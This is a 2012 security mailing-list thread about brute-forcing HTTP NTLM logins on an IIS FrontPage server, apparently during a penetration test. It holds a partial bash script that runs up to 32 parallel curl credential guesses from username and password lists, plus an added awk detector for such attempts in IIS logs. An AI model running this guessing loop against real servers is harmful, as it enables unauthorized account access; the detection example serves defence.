Back when nothing supported Outlook Web Access bruteforcing, I wrote a
simple bash script that automated the process using "curl"... I
suggest you do the same.

"curl --ntlm" -> it will be two nested for loops, the outer iterates
through usernames, the inner iterates through passwords... then process
server's answer using multiple grep and cut to check for correct/bad
credentials using variables and "if".

The only problem with that method will be the speed (lack of), so I have
included a simple function to make sure at least "32" instances of curl are
running at any given time.

===== start of code example=====
#!/bin/bash
.....
.....
# Block until fewer than 32 curl processes are running.
CheckCurl(){
        while [ "$(pidof curl | wc -w)" -ge 32 ]
        do
                sleep 0.1
        done
}

echo "[*] Starting..."
for USER in $(cat "$userList")
do
        for PASSWORD in $(cat "$passList")
        do
                # before running the command, we want to make sure that the running instances of curl are not greater than 32
                CheckCurl
                # note that this will save the output to a folder called "html_out", change that or create it.
                # double quotes are needed so that $USER and $PASSWORD are expanded
                curl --ntlm -u "domain\\$USER:$PASSWORD" blah blah blah blah ....... & # the ending ampersand is very important for multithreading
        done

done

===== End of code example=====

Hope that helps,
Sherif Eldeeb.
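
For the defending side, a guessing loop like the one above leaves a recognisable trail in the web server log. The following is an added example, not part of the original message: it counts failed NTLM logons per client IP in an IIS W3C log and reports the IPs at or above a threshold. The log lines are constructed, and the mapping of a rejected logon to status 401.1 with sc-win32-status 2148074252 (SEC_E_LOGON_DENIED) is an assumption about how the server records it.

```shell
#!/bin/bash
# Added example, not from the original thread: count failed NTLM logons per
# client IP in an IIS W3C log and report the IPs at or above a threshold.

# Constructed sample log (documentation-range addresses, made-up account).
sample_log() {
cat <<'EOF'
#Version: 1.0
#Fields: date time cs-method cs-uri-stem cs-username c-ip sc-status sc-substatus sc-win32-status
2012-05-25 10:00:01 OPTIONS / - 198.51.100.7 401 1 2148074254
2012-05-25 10:00:01 OPTIONS / - 198.51.100.7 401 1 2148074252
2012-05-25 10:00:02 OPTIONS / - 198.51.100.7 401 1 2148074254
2012-05-25 10:00:02 OPTIONS / - 198.51.100.7 401 1 2148074252
2012-05-25 10:00:03 OPTIONS / - 198.51.100.7 401 1 2148074254
2012-05-25 10:00:03 OPTIONS / - 198.51.100.7 401 1 2148074252
2012-05-25 10:05:10 OPTIONS / - 192.0.2.10 401 2 5
2012-05-25 10:05:10 OPTIONS / - 192.0.2.10 401 1 2148074254
2012-05-25 10:05:10 OPTIONS / - 192.0.2.10 401 1 2148074252
2012-05-25 10:05:20 OPTIONS / - 192.0.2.10 401 1 2148074254
2012-05-25 10:05:20 OPTIONS / EXAMPLE\alice 192.0.2.10 200 0 0
EOF
}

# usage: ntlm_failures THRESHOLD < logfile
# Prints "IP COUNT" for every client with COUNT >= THRESHOLD denied logons.
ntlm_failures() {
    awk -v limit="$1" '
        /^#Fields:/ {
            # Map field names to column numbers; "#Fields:" itself is $1.
            for (i = 2; i <= NF; i++) col[$i] = i - 1
            next
        }
        # Skip other directives, and data seen before any #Fields header.
        /^#/ || !("c-ip" in col) { next }
        # 401.1 + SEC_E_LOGON_DENIED: credentials were sent and rejected
        # (assumed mapping). 2148074254 lines are handshake legs, not guesses.
        $col["sc-status"] == 401 && $col["sc-substatus"] == 1 &&
        $col["sc-win32-status"] == "2148074252" {
            fails[$col["c-ip"]]++
        }
        END {
            for (ip in fails)
                if (fails[ip] >= limit) print ip, fails[ip]
        }
    ' | sort
}

sample_log | ntlm_failures 3
```

The threshold is a tuning knob: a user who mistypes a password once produces a single denied logon, so it stays below any threshold above 1.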

On Fri, May 25, 2012 at 11:10 PM, Robin Wood <[email protected]> wrote:

> On 25 May 2012 16:59, Navarro, Gregory J <[email protected]> wrote:
> > Do you know of a valid login but just not the password?  If so just fuzz
> > it with Burp
>
> I have no credentials but even if I did I don't think Burp does NTLM,
> for it to do it it would have to be able to work with the four way
> handshake and I've not seen anywhere that that appears to be an
> option. If you can point me at how to do it I'll happily try.
>
> Robin
>
> > From: [email protected] [mailto:[email protected]] On Behalf Of Robin Wood
> > Sent: Thursday, May 24, 2012 6:08 AM
> > To: Tony Turner; PaulDotCom Security Weekly Mailing List
> > Cc: _; [email protected]
> > Subject: Re: [Pauldotcom] hydra and HTTP NTLM
> >
> > On 24 May 2012 13:36, Tony Turner <[email protected]> wrote:
> >> Have you tried http://www.foofus.net/~jmk/tools/FPbrute.pl yet? Or is there
> >> a reason you wanted to use Hydra?
> >
> > I've tried that but it seems to expect the login request for a simple
> > GET. I'm testing a FrontPage install which allows me to read but then
> > fails on write. Checking the traffic when I click save it sends an
> > OPTIONS request which gets a reply of 401 which triggers FP to then
> > start the handshake.
> >
> > Robin
> >
> >> ________________________________
> >> From: Robin Wood <[email protected]>
> >> To: _ <[email protected]>
> >> Cc: "[email protected]" <[email protected]>; PaulDotCom
> >> Mailing List <[email protected]>
> >> Sent: Thursday, May 24, 2012 8:17 AM
> >> Subject: Re: [Pauldotcom] hydra and HTTP NTLM
> >>
> >> On 24 May 2012 13:06, _ <[email protected]> wrote:
> >>> http ntlm is IIS based windows auth.
> >>
> >> Yes but I still don't know how to attack it.
> >>
> >> Robin
> >>
> >>> On May 23, 2012, at 6:14 AM, Robin Wood <[email protected]> wrote:
> >>>
> >>>> Anyone know how to use the new HTTP NTLM feature in Hydra? I'm trying
> >>>> to brute force a MS Front Page login which only asks for
> >>>> authentication when the OPTIONS method is used as far as I can tell.
> >>>>
> >>>> Robin
> >>>>
> >>>>
> >>>>
> >>>> This list is sponsored by Cenzic
> >>>> --------------------------------------
> >>>> Let Us Hack You. Before Hackers Do!
> >>>> It's Finally Here - The Cenzic Website HealthCheck. FREE.
> >>>> Request Yours Now!
> >>>> http://www.cenzic.com/2009HClaunch_Securityfocus
> >>>> --------------------------------------
> >>>>
> >> _______________________________________________
> >> Pauldotcom mailing list
> >> [email protected]
> >> http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
> >> Main Web Site: http://pauldotcom.com